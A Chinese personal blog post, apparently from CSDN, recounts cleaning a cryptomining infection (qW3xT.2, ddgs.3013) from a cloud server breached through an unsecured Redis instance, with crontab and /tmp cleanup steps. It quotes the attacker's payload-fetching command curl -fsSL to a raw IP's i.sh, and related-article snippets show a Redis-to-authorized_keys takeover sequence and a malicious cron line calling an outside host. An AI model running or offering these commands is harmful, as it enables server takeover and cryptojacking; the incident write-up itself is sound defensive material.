linux系统遇到挖矿程序

最新推荐文章于 2024-06-19 20:58:40 发布
最新推荐文章于 2024-06-19 20:58:40 发布
阅读量1.6w 收藏 4
点赞数 2
分类专栏: 随笔 文章标签: 挖矿程序 qW3xT.2

作为一个小白,在阿里买个一个服务器用来学习使用,前不久刚安装了redis,犹豫没有及时配置,导致服务器被恶意攻击了

阿里推给我好几条消息,一开始我还没在意,但到真的登入服务器敲命令的时候才发现,很卡!!!

查了一下cpu占有率,发现原来是这个进程的问题,kill把这个进程杀掉,完结!

结果没过多久,整个系统又卡的不行,反映又慢了一拍,查看了下还是这个顽强的进程。。。没辙,只能看看有没有什么解决方案,让我找到了一篇和我遇到情况一模一样的,真是难兄难弟。

直接说解决方案:

在定时任务里面被别人写入了这样一行,果断删除!

但是并没有什么用,就算继续kill掉还是会出现。

接着执行 curl -fsSL http://149.56.106.215:8000/i.sh

通过这个发现

/var/spool/cron/crontabs/root

/var/spool/cron/root(对于这个,我只发现了一个类似的文件,里面写着这个路径,接着把它删了不知对不对)

写入了和定时任务一样的语句,删除!!!

最后删除在 /temp下的两个文件 qW3xT.2文件和ddgs.3013 ,进程再kill掉这两个

到此,系统恢复正常,瞬间操作流畅。记录下,看日后是否还会出现。

原解决方法地址链接:https://blog.csdn.net/weixin_41228949/article/details/81501753

 

破草
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux挖矿检测,详谈挖矿木马的检测和解决方案
weixin_33733806的博客
05-14 3278
挖矿木马挖矿木马一般通过查看当前CPU运行情况就能确认,windows下任务管理器中就能看到,linux下使用top命令,查看到某个进程持续保持在80%-90%以上的CPU,基本就是对应的木马进程了。win下一般选中进行右键打开文件位置就能定位到对应目录linux下使用ps -aux|grep “木马进程名” 即可找到对应路径和文件定位到木马后,需要对其进行清除操作,挖矿木马麻烦的就是系统驻留,w...
Linux服务器中挖矿病毒
热门推荐
清风弄影
05-19 1万+
linux服务器中了挖矿病毒了,其脚步内容如下,按照脚本内容涉及进行清理。其中XMRSH需要先用chattr -i /tmp/XMRSH修改属性,否则删除不掉。#!/bin/bash#Welcome like-minded friends to come to exchange.#We are a group of people who have a dream.#              ...
Linux服务器挖矿病毒处理
最新发布
自己在学习过程中的总结
06-19 1295
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
挖矿程序入侵解决方案
super的博客
11-28 4289
本人自己购买了一台阿里云服务器来玩,晚上收到被挖矿程序入侵,处理过程大概是这样的使用top命令查看看那些进程是陌生的并且占用大量cpu,因为是挖矿机肯定会占用很多cpu,先不要着急kill掉,因为一般都会重启启动的,我用history(也可以查看~/.bash_history文件)查看历史命令发现如下内容(我手敲的代码,可能有个别手误,网页端不能copy),这个是入侵系统的脚本,从中可以看出些端...
Linux】排查进程、挖矿病毒查找
qq_39165617的博客
02-28 6292
这里写目录标题问题查看期父子进程以及命令查看其网络连接排查解决 问题 实验室中有一台服务器,top指令发现一进程-bash其CPU占用极高,使用了20个核心,占用高达50%,使用kill指令停止进程后又会重新启动 查看期父子进程以及命令 ps 发现其执行命令为systemd pstree,每个核心开了一个在跑 查看其网络连接 发现其与国外某IP建立了tcp连接 排查 查看定时任务 crontab -l 还可查看自启动服务,执行ll /etc/systemd/system/multi-user.t
linux挖矿病毒排查-实操
w_kndy的博客
11-03 769
linux挖矿排查实战,看这一篇就够了
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3712
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
Linux运维|记录一个挖矿病毒
qq_42968558的博客
08-19 417
本文转载自本人公众号 现象 任何程序都会在执行一段时间之后被kill 检查top命令,得到结果如下: 检查crontab发现root中被写入定时服务:用crontab往服务器写入了一个命令,会定时调用python进程连接到 166.111.57.30:3333这个位置远程跑程序。 * * * * * python -lan 166.111.57.30:3333 检查发现3333端口前一段时间爆发挖矿病毒,怀疑是166.111.57.30成为校内肉鸡。基本确定是挖矿木马。此条命令清除掉之后,还是有同样的
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1330
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
一次Ubuntu下的排雷记录
dinght2000的博客
09-17 327
起因 某天,发现一台服务器上出现了一个大量占用cpu资源的进程。尝试手动杀掉,但很快就会自动重新创建新的进程。 追查 用命令lsof -p 10316 查看其文件路径: 该进程文件夹/proc/10316下: 看到该文件夹下的exe文件是指向/var/tmp/.../Word,也就是文件夹名字就是"...",查看简要的信息: 其中: cmdline — 启动当前进程的完整命令 ...
记一次Linux服务器遭遇挖矿
程序媛
10-23 2828
昨天需要用服务器跑一个代码,结果nvidia-smi命令结果显示GPU基本被一个miner/ld-linux-x86-64.so.2的process占满,查看该进程用户为root。跟实验室同学确认无人知晓,初步判断为挖矿病毒,先kill掉再说:kill 19459 下午忙着看代码看论文没有管这个病毒的事,当我晚上再次查看服务器准备运行命令时,却再次显示GPU被占满。同样的场景再现。于是,我准备认真...
Linux中招挖矿木马如何处置,附带解决方案
是故事啊~关注我~
01-25 6940
前段时间一位朋友在群里反应,公司的部署大数据集群的Linux服务器中了挖矿木马病毒,让我给他解决,分享一下解决方法。 一. 什么是挖矿木马 首先经过多年的演进,越来越多的挖矿木马利用多种方式入侵系统,意图感染更多的机器,提高挖矿的效率和收益,其中主要入侵方式如下: 1. 漏洞利用:利用系统漏洞快速获取相关服务器权限,植入挖矿木马是目前最为普遍的传播方式之一。常见的漏洞包括Windows系统漏洞、服务器组件插件漏洞、中间件漏洞、web漏洞等。 部分攻击者选择直接利用永恒之蓝...
挖矿入侵Linux系统排查步骤
aischang
04-11 9143
一、注意事项 1. 在做入侵排查前使用命令HISTFILE=/dev/null,将本次shell下执行的命令不写入.bash_history中避免干扰之前的历史命令,该命令仅针对当次shell有效,重开shell后需要重新执行该命令。 2. 在确定找到恶意文件或被入侵的原因之前,切勿杀死恶意进程或重启系统,否则会破坏现场。 3. 可能存在ps、netstat、ls等命令异常,可能是已被攻击者或病毒木马等替换,此时需要及时删除这些命令文件,使用正确的文件,以便于再次启动恶意文件。 检查方法: 可.
Linux服务器发现挖矿程序清除办法
qq_33820379的博客
06-17 2380
1.查看目录是否有/tmp或者/temp可疑文件,删除文件,如果文件不是可删除的则使用chmod,如果chmod不行,查看llattr /tmp , 带i是无法删除的,请自行百度 执行以下命令移除i:chattr -i kthrotlds name php systemd .systemd-analyze .systemd-login thisxxs watchdogs xc.x86_64 ...
linux——挖矿程序处理
sunfragrence的博客
12-12 3618
记一次挖矿程序入侵以及解决实操! 1,过程记录 系统挖矿程序入侵,导致系统CPU飙升。kill掉进程后自动重启。 无论kill -9还是直接把系统中nanoWatch所对应的进程文件删除,一样会定时重启。 使用crontab -e查看当前系统的定时任务信息,如下: 显示定时从链接中下载文件,于是在浏览器中访问该地址,下载的文件截图如下: 很明显,这是一个恶意脚本,定时检查...
记一次Linux被入侵,服务器变“矿机”全过程
yeluoxiang的专栏
06-13 4695
“周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...
Linux服务器被挖矿程序sustse和kworkerds感染后续处理
xinxin_2011的博客
12-17 4913
在上一篇博文Linux系统发现占用CPU达100%的进程并处理 里面以为已经把挖矿程序sustse处理干净了,可是没过两天又收到阿里云短信提醒,说服务器有问题,难道还有后门吗?也多亏阿里云给出提示“出现了可疑安全事件:Linux共享库文件预加载配置文件可疑篡改”。网上查了查相关内容,原来这个后门是动态链接库预加载机制造成的。 动态链接库预加载机制是系统提供给用户运行自定义动态链接库的一种方式,在可...
Linux排除挖矿程序流程
PublicUsingner的博客
06-29 337
Linux排除挖矿程序流程
记一次Linux挖矿程序解决经历
一半的博客
09-04 3770
注意:线上当时没截图,以下截图均为解决问题后截取的。 使用top命令可看到CPU使用180%~200%。 $ top 使用free -m 查看内存使用情况,此时内存并没多少占用。 $ free -m 系统符合被挖矿特征,同时阿里云控制台也检测到疑似被挖矿程序入侵。 首先通过top命令可以查看到进程的pid: 可以通过ls -l /proc/xxx/exe命令查找到进程对应资源的位置,xxx表示进程的pid。 # xxx为pid $ ls -l /proc/xxx/exe 查找到文件位置之后,就
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值